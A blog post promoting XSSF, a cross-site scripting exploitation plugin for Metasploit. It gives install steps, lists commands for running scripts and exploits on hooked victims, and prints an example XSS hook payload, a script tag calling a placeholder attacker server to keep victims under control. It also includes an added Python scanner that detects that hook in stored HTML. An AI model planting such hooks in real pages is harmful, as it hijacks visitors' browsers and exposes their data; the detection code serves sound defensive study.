XSSF is an amazing framework developed for use within the Metasploit Framework. It lets you manage the victims of a generic XSS attack and keep an already existing connection to them open in order to allow future attacks.
The Cross-Site Scripting Framework (XSSF) is a security
tool designed to turn the XSS vulnerability exploitation task into a
much easier work. The XSSF project aims to demonstrate the real dangers
of XSS vulnerabilities, vulgarizing their exploitation. This project is
created solely for education, penetration testing and lawful research
purposes. [by XSSF at GoogleCode]
Quick Installation
After you install it into MSF (directory where you have MSF installed), you load XSSF like this:
Typical MSF folder: /opt/metasploit/msf
$> wget http://dev.metasploit.com/redmine/attachments/596/XSSF.zip
$> unzip XSSF.zip
Copy all the files extracted from XSSF.zip into their corresponding folders: data/ lib/ modules/ plugins/
$> msfconsole
msf > load XSSF
New commands are available:
- Simple Script/HTML execution (XSSF auxiliary modules) on targeted victim or group of victims
- MSF Exploit execution on targeted victim
- XSS Tunnel with targeted victim
Example of XSS Attack:
<script src="http://IP_Server-MSF:Listen-Port/loop?interval=5"></script>
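A defender can look for this hook in stored content. The following added example (not part of the original post or of XSSF) scans rendered HTML for off-origin script includes shaped like the /loop?interval=N URL above; find_xssf_hooks, the sample comments and the 192.0.2.10 and blog.example hosts are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs


class HookFinder(HTMLParser):
    """Collect off-origin <script src> URLs shaped like /loop?interval=N."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names for us.
        src = dict(attrs).get("src") if tag == "script" else None
        if not src:
            return
        try:
            url = urlsplit(src.strip())
            host = (url.hostname or "").lower()
        except ValueError:  # malformed URL, e.g. a broken IPv6 literal
            return
        interval = parse_qs(url.query).get("interval", [""])[0]
        off_origin = bool(host) and host != self.page_host
        hook_shape = url.path.rstrip("/").endswith("/loop") and interval.isdigit()
        if off_origin and hook_shape:
            self.hits.append(src.strip())


def find_xssf_hooks(html, page_host):
    """Return the script URLs in `html` that match the hook pattern."""
    finder = HookFinder(page_host)
    finder.feed(html)
    finder.close()
    return finder.hits


# Constructed sample: four stored comments as rendered on blog.example.
SAMPLE_COMMENTS = """
<p>Nice post!</p><script src="/static/loop?interval=5"></script>
<p>Thanks</p><script src="https://cdn.example/lib/jquery.min.js"></script>
<p>hi</p><script src="http://192.0.2.10:8888/loop?interval=5"></script>
<p>yo</p><SCRIPT SRC='//192.0.2.10:8888/loop?interval=10'></SCRIPT>
"""

if __name__ == "__main__":
    for url in find_xssf_hooks(SAMPLE_COMMENTS, "blog.example"):
        print("suspicious script include:", url)
```

The check keys on the path and parameter shown in the example above, so treat a miss as inconclusive. A Content-Security-Policy that restricts script-src to trusted origins blocks this kind of include regardless of its URL.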
UPDATE (04/10/2011)
I received advice via Twitter from user @X0x1RG9f, who gave me the correct URL of the XSSF maintained version.
Demonstration videos
Now you can watch amazing videos showing how XSSF works:
1. XSSF Android file stealer
2. Launching MSF exploit through XSSF (CVE-2010-2568)
Download
Source: XSSF to Metasploit Framework | XSSF Google Code Project
For Spanish readers, I recommend the following article, "Exploiting with XSSF" [Spanish language], or this other one, "XSSF+Metasploit+Ubuntu 11.04" [Spanish language].